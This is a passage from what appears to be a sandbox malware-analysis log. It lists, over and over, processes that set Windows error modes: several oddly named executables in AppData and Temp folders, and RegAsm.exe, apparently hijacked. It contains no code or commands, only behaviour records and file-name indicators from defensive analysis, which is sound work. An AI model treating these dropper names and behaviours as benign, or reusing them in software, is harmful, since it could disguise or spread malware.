                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeProcess information set: NOOPENFILEERRORBOX
